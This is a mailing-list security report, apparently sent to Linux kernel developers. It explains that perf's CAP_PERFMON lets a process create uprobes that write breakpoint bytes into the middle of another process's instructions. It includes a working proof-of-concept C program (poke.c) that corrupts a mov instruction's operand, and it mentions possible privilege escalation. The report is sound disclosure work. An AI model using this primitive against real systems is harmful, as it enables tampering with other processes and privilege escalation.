Message-ID: <CAG48ez1n4520sq0XrWYDHKiKxE_+WCfAK+qt9qkY4ZiBGmL-5g@mail.gmail.com>
Date: Tue, 1 Jul 2025 18:14:51 +0200
From: Jann Horn <jannh@...gle.com>
To: Serge Hallyn <serge@...lyn.com>, linux-security-module <linux-security-module@...r.kernel.org>, Peter Zijlstra <peterz@...radead.org>, Ingo Molnar <mingo@...hat.com>, Arnaldo Carvalho de Melo <acme@...nel.org>, Namhyung Kim <namhyung@...nel.org>, Mark Rutland <mark.rutland@....com>, Alexander Shishkin <alexander.shishkin@...ux.intel.com>, Jiri Olsa <jolsa@...nel.org>, Ian Rogers <irogers@...gle.com>, Adrian Hunter <adrian.hunter@...el.com>, "Liang, Kan" <kan.liang@...ux.intel.com>, linux-perf-users@...r.kernel.org
Cc: Kernel Hardening <kernel-hardening@...ts.openwall.com>, linux-hardening@...r.kernel.org, kernel list <linux-kernel@...r.kernel.org>, Alexey Budankov <alexey.budankov@...ux.intel.com>, James Morris <jamorris@...ux.microsoft.com>
Subject: uprobes are destructive but exposed by perf under CAP_PERFMON

Since commit c9e0924e5c2b ("perf/core: open access to probes for
CAP_PERFMON privileged process"), it is possible to create uprobes
through perf_event_open() when the caller has CAP_PERFMON. uprobes can
have destructive effects, while my understanding is that CAP_PERFMON
is supposed to only let you _read_ stuff (like registers and stack
memory) from other processes, but not modify their execution.

uprobes (at least on x86) can be destructive because they have no
protection against poking in the middle of an instruction; basically
as long as the kernel manages to decode the instruction bytes at the
caller-specified offset as a relocatable instruction, a breakpoint
instruction can be installed at that offset.

This means uprobes can be used to alter what happens in another
process. It would probably be a good idea to go back to requiring
CAP_SYS_ADMIN for installing uprobes, unless we can get to a point
where the kernel can prove that the software breakpoint poke cannot
break the target process. (Which seems harder than doing it for
kprobe, since kprobe can at least rely on symbols to figure out where
a function starts...)

As a small example, in one terminal:
```
jannh@...n:~/test/perfmon-uprobepoke$ cat target.c
#include <unistd.h>
#include <stdio.h>

__attribute__((noinline))
void bar(unsigned long value) {
  printf("bar(0x%lx)\n", value);
}

__attribute__((noinline))
void foo(unsigned long value) {
  value += 0x90909090;
  bar(value);
}

void (*foo_ptr)(unsigned long value) = foo;

int main(void) {
  while (1) {
    printf("byte 1 of foo(): 0x%hhx\n",
           ((volatile unsigned char *)(void*)foo)[1]);
    foo_ptr(0);
    sleep(1);
  }
}
jannh@...n:~/test/perfmon-uprobepoke$ gcc -o target target.c -O3
jannh@...n:~/test/perfmon-uprobepoke$ objdump --disassemble=foo target
[...]
00000000000011b0 <foo>:
    11b0:       b8 90 90 90 90          mov    $0x90909090,%eax
    11b5:       48 01 c7                add    %rax,%rdi
    11b8:       eb d6                   jmp    1190 <bar>
[...]
jannh@...n:~/test/perfmon-uprobepoke$ ./target
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
```

and in another terminal:
```
jannh@...n:~/test/perfmon-uprobepoke$ cat poke.c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/perf_event.h>

int main(void) {
  int uprobe_type;
  FILE *uprobe_type_file =
      fopen("/sys/bus/event_source/devices/uprobe/type", "r");
  if (uprobe_type_file == NULL)
    err(1, "fopen uprobe type");
  if (fscanf(uprobe_type_file, "%d", &uprobe_type) != 1)
    errx(1, "read uprobe type");
  fclose(uprobe_type_file);
  printf("uprobe type is %d\n", uprobe_type);

  unsigned long target_off;
  FILE *pof = popen("nm target | grep ' foo$' | cut -d' ' -f1", "r");
  if (!pof)
    err(1, "popen nm");
  if (fscanf(pof, "%lx", &target_off) != 1)
    errx(1, "read target offset");
  pclose(pof);
  target_off += 1;
  printf("will poke at 0x%lx\n", target_off);

  struct perf_event_attr attr = {
    .type = uprobe_type,
    .size = sizeof(struct perf_event_attr),
    .sample_period = 100000,
    .sample_type = PERF_SAMPLE_IP,
    .uprobe_path = (unsigned long)"target",
    .probe_offset = target_off
  };
  int perf_fd = syscall(__NR_perf_event_open, &attr, -1, 0, -1, 0);
  if (perf_fd == -1)
    err(1, "perf_event_open");
  char *map = mmap(NULL, 0x11000, PROT_READ, MAP_SHARED, perf_fd, 0);
  if (map == MAP_FAILED)
    err(1, "mmap error");
  printf("mmap success\n");
  while (1) pause();
}
jannh@...n:~/test/perfmon-uprobepoke$ gcc -o poke poke.c -Wall
jannh@...n:~/test/perfmon-uprobepoke$ sudo setcap cap_perfmon+pe poke
jannh@...n:~/test/perfmon-uprobepoke$ ./poke
uprobe type is 9
will poke at 0x11b1
mmap success
```

This results in the first terminal changing output as follows, showing
that 0xcc was written into the middle of the "mov" instruction,
modifying its immediate operand:
```
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0xcc
bar(0x909090cc)
byte 1 of foo(): 0xcc
bar(0x909090cc)
```

It's probably possible to turn this into a privilege escalation by
doing things like clobbering part of the distance of a jump or call
instruction.